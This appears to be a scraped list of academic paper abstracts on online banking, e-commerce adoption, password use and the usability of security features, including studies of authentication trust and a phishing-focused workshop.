The current Internet Banking (eBanking) marketplace is highly functionally convergent. Electronic statement (eStatement) functionality is an area of potential competitive advantage. This paper describes an experiment in which a group of bank customers (N = 182) undertook information retrieval tasks using three variants of eStatements functionality incorporated into a working eBanking prototype. The experiment examined how the eStatements service design could influence a customer’s desire to switch from paper statements to online delivery. Three different levels of functionality were assessed for usability and for their impact on the customer’s willingness to switch from paper to eStatements. The methodology of the experimental approach utilised in this research is described. The results provide detailed data to inform the interface design and business case for eStatements. Usability and propensity to switch away from paper were significantly correlated. The data confirm that provision of a functionally sophisticated search engine offers high usability perceptions and scope for significant levels of switching from paper to online statements with associated costs savings.
Article
Computer users are exposed to technology mainly through user interfaces. Most users' perceptions are based on their experience with these interfaces. HCI (human computer interaction) is concerned with these interfaces and how they can be improved. Considerable research has been conducted and major advances have been made in the area of HCI. Information security is becoming increasingly important and more complex as business is conducted electronically. However, state-of-the-art security-related product development has ignored general aspects of HCI. The objective of this paper is to promote and enable security awareness of end-users in their interaction with computer systems. It thus aims to consolidate and integrate the two fields of information security and HCI. HCI as a research discipline is a well developed field of study, and the authors are of the opinion that the use of security technologies can be significantly enhanced by employing proven HCI concepts in the design of these technologies. In order to achieve this, various criteria for a successful HCI in a security-specific environment will be examined. Part of the Windows XP Internet Connection Firewall will be used as a case study and analysed according to these criteria, and recommendations will be made.
Article
With an increasing range of potential threats, the use of security within end-user systems and applications is becoming ever more important. However, a significant obstacle to achieving this can be the usability of the security features that are offered, and although related functionality is now provided in a wide range of end-user applications, the users themselves will fail to benefit if they cannot make it work for them. This paper highlights the importance of enabling users to protect themselves, and identifies that they may currently encounter problems in terms of finding, understanding, and ultimately using the security features that are meant to be at their disposal. The security options within Microsoft Word are used to provide illustrative examples of typical problems, with consequent suggestions to improve both the presentation and guidance available to users within such applications.
Article
The Internet has the ability to function as a business medium. Over one-third of US residents use the Internet, and nearly 40% use it as a medium of business (electronic-commerce). As this percentage continues to grow, so does the need to understand why and how users choose to adopt. This information will afford researchers and e-commerce providers a better understanding of how to facilitate future adoption. Through the diffusion of innovations model, this study revisits traditional and current concepts of adoption by investigating the adoption of four e-commerce activities currently available to Internet users: (1) online shopping, (2) online banking, (3) online investing, and (4) electronic payment for an Internet service (i.e., access to exclusive sites). Results indicate that six attributes common to the diffusion model (i.e., perceived convenience and financial benefits, risk, previous use of the telephone for a similar purpose, self-efficacy, and Internet use) all play a significant role in the adoption processes. Results also indicate that when users decide to adopt one of these activities they tend to adopt another. Finally, a discussion explores how to extend the model identified in this study by assessing possible negative outcomes of diffusion.
Article
Computer security has traditionally been assessed from a technical point of view. Another way to assess it is by investigating the role played by legitimate users of systems in impairing the level of protection. In order to address this issue, we wish to adopt a multidisciplinary standpoint and investigate some of the human aspects involved in computer security. From research in psychology, it is known that people make biased decisions. They sometimes overlook rules in order to gain maximum benefits for the cost of a given action. This situation leads to insidious security lapses whereby the level of protection is traded off against usability. In this paper, we highlight the cognitive processes underlying such security impairments. At the end of the paper, we propose a short usability-centred set of recommendations.
Article
In the modern multi-user computer environment, Internet-capable network servers provide connectivity that allows a large portion of the user population to access information at the desktop from sources around the world. Because of the ease with which information can be accessed, computer security breaches may occur unless systems and restricted information stored therein are kept secure. Breaches of security can have serious consequences, including theft of confidential corporate documents, compromise of intellectual property, unauthorized modification of systems and data, denial of service, and others. Considerable research has been conducted on threats to security.
Article
Organizations are more dependent than ever on the reliable operation of their information systems, which have become a key to their success and effectiveness. While the growing dependence on information systems creates an urgent need to collect information and make it accessible, the proliferation of computer technology has also spawned opportunities for ill-intentioned individuals to violate the information systems' integrity and validity. One of the most common control mechanisms for authenticating users of computerized information systems is the use of passwords. However, despite the widespread use of passwords, little attention has been given to the characteristics of their actual use. This paper addresses the gap in evaluating the characteristics of real-life passwords and presents the results of an empirical study on password usage. It investigates the core characteristics of user-generated passwords and associations among those characteristics.
Article
The Internet has been given tremendous publicity in recent years. However, most research focuses on Europe or America rather than on Asian countries. This study hopes to contribute to a better understanding of the Internet phenomenon in Asia by examining the factors influencing the adoption and nonadoption of the Internet among organizations in Singapore. A survey was carried out among business firms to examine the benefits of adopting the Internet, reasons for not adopting the Internet, and the criteria for selecting Internet access service providers. The results showed that key benefits are derived from the global nature of the Internet, which enables access to worldwide information and the creation of a worldwide electronic presence. Nonadopters of the Internet are concerned about whether staff will waste time surfing the Internet. Both access speed and technical support are viewed as important criteria in selecting an Internet access service provider (IASP). Implications of the results are discussed.
Article
Legislative mandates potentially replace CIO's primary concerns of technology risk management with the possibility of serving jail time.
Article
The consequences of information system failure become more acute as organizations continue to invest in information technology and application development. Being able to better predict IS failure before implementation of a system could facilitate changes in the information system that can lead to implementation success. The realism of user expectations has been suggested as one possible means of assessing the eventual success or failure of an IS. Cognitive dissonance theory was used to hypothesize the behavior and attitudes of end users having certain expectations of a system. This experiment investigates the association between unrealistic expectations with both users' perceptions (i.e., user satisfaction) and their performance with the IS (i.e., decision performance). A longitudinal experiment was performed in which the expectations of the subjects were manipulated to be unrealistically high, realistically moderate, or unrealistically low. The results suggest an association between realism of users' expectations and their perceptions but not their actual performance. Future research should be directed toward the development of an instrument to measure user expectations, as well as toward understanding the causes of unrealistic user expectations.
Article
The Internet is gaining popularity as a delivery channel in the banking sector. At the same time, customer needs are changing. A total of 12 Internet banking operations in the UK are analysed under customer empowerment functions and Internet banking Web attributes. Internet banking renders location and time irrelevant, and empowers customers with greater control of their accounts. Banks achieve cost and efficiency gains in a large number of operational areas.
Article
Growing threats to online banking security (e.g. phishing, personal identity fraud) and the personal nature of the data make the balance between security, trust and usability vital. However, there is little published research about what influences users' perceptions of online banking security and trust. This study identifies that the type of authentication system used can affect users' subsequent perceived control, situational awareness and trust. The results from a questionnaire and in-depth interviews with 86 participants were triangulated to compare two different authentication processes, namely, a 'security box' (i.e. random system-generated passwords at the user's location) and 'fixed passwords' (i.e. user-owned and constant). The security box and login procedures were perceived as significantly more trustworthy and secure at any location than 'fixed passwords'. Four main concepts were identified: "trust", "the authentication system", "location" and "control". The implications of these findings for HCI are discussed.
Article
The Trustworthy Interfaces for Passwords and Personal Information workshop brought security and user interface professionals together to determine ways to improve authentication methods so that users won't be tricked by phishers into giving away personal information. The authors consider some of the themes discussed at TIPPI, including the nature of the authentication problem, systems that might help solve it, and other observations on necessary components of secure systems designed for human users.
Article
For decades, the password has been the standard means for user authentication on computers. However, as users are required to remember more, longer, and changing passwords, it is evident that a more convenient and secure solution to user authentication is necessary. This paper examines passwords, security tokens, and biometrics (which we collectively call authenticators) and compares these authenticators and their combinations. We examine their effectiveness against several attacks and suitability for particular security specifications such as compromise detection and nonrepudiation. Examples of authenticator combinations and protocols are described to show tradeoffs and solutions that meet chosen, practical requirements. The paper endeavors to offer a comprehensive picture of user authentication solutions for the purposes of evaluating options for use and identifying deficiencies requiring further research.
Article
This paper describes the history of the design of the password security scheme on a remotely accessed time-sharing system. The present design was the result of countering observed attempts to penetrate the system. The result is a compromise between extreme security and ease of use.